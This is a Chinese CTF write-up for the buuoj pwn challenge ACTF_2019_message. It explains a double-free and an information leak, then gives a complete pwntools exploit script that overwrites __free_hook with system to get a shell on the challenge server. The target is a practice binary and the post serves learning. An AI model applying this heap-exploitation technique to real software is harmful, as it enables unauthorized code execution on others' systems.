0%

ACTF_2019_message

发表于 分类于
本文字数: 3.3k 阅读时长 ≈ 3 分钟

buuoj刷pwn题之ACTF_2019_message

heap题,有add,delete,edit,show

没开PIE,got表不可写

(buuoj没有给libc,原题是有的,buuoj有原题链接,进去下载)

delete函数没有清空指针,存在double free:

delete

add函数无\x00截断字符串,加上show函数应该可以泄露信息:

add

show

思路,double free,malloc到可以控制nodes的chunk

修改nodes,指向got表,泄露地址,再修改nodes指向free_hook,修改成system,然后free来getshell

本地ok,但远程偏移相差0x10(具体看注释),而且远程死活getshell不成功

题目的libc是2.23,无法getshell,换成本地的2.27,成了,具体原因不太清楚

buuoj用的是libc2.27有tcache机制,不需要fastbin范围检查,exp一开始是按照2.23来写的,考虑了范围检查,就懒得改了

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#coding=utf8
#!/usr/bin/python2

from PwnContext import *
      
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# functions for quick script
s       = lambda data               :ctx.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096,timeout=2:ctx.recv(numb, timeout=timeout)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32    = lambda data   :u32(data.ljust(4, '\x00'))
uu64    = lambda data   :u64(data.ljust(8, '\x00'))
leak    = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))

ctx.binary = './ACTF_2019_message'
ctx.remote = ('node3.buuoj.cn', 29881)
#ctx.remote_libc = './libc.so.6'
ctx.remote_libc = '../../libc/libc-2.27.so'
ctx.debug_remote_libc = True

rs()
#rs('remote')
# print(ctx.libc.path)

def add(size, content):
    sla("What's your choice: ", '1')
    sla('Please input the length of message:\n', str(size))
    sa('Please input the message:\n', content)


def free(index):
    sla("What's your choice: ", '2')
    sla('Please input index of message you want to delete:\n', str(index))


def edit(index, content):
    sla("What's your choice: ", '3')
    sla('Please input index of message you want to edit:\n', str(index))
    sa('Now you can edit the message:\n', content)
    

def show(index):
    sla("What's your choice: ", '4')
    sla('Please input index of message you want to display:\n', str(index))


add(0x68, 'a\n') # 0
add(0x68, 'a\n') # 1
add(0x10, '/bin/sh\x00') # 2


#stderr_addr =  0x602040
nodes_addr = 0x602060


free(0)
free(1)
free(0)


add(0x68, p64(nodes_addr)) # 3
add(0x68, 'a\n') # 4
add(0x68, 'a\n') # 5
add(0x68, p64(0x8) + p64(ctx.binary.got['puts'])) # 6

# nodes[0].mem = ctx.binary.got['puts'], nodes[0].size = 0x20


show(0)
ru('The message: ')
puts_addr = ru('\n').strip()
puts_addr = uu64(puts_addr)

libc_base = puts_addr - ctx.libc.sym['puts']
system_addr = libc_base + ctx.libc.sym['system']
free_hook = libc_base + ctx.libc.sym['__free_hook']
malloc_hook = libc_base + ctx.libc.sym['__malloc_hook']

leak('puts', puts_addr)
leak('libc_base', libc_base)
leak('system', system_addr)
leak('free', free_hook)
leak('malloc', malloc_hook)


edit(6, p64(0x8) + p64(free_hook))
edit(0, p64(system_addr))

free(2)

#dbg()

irt()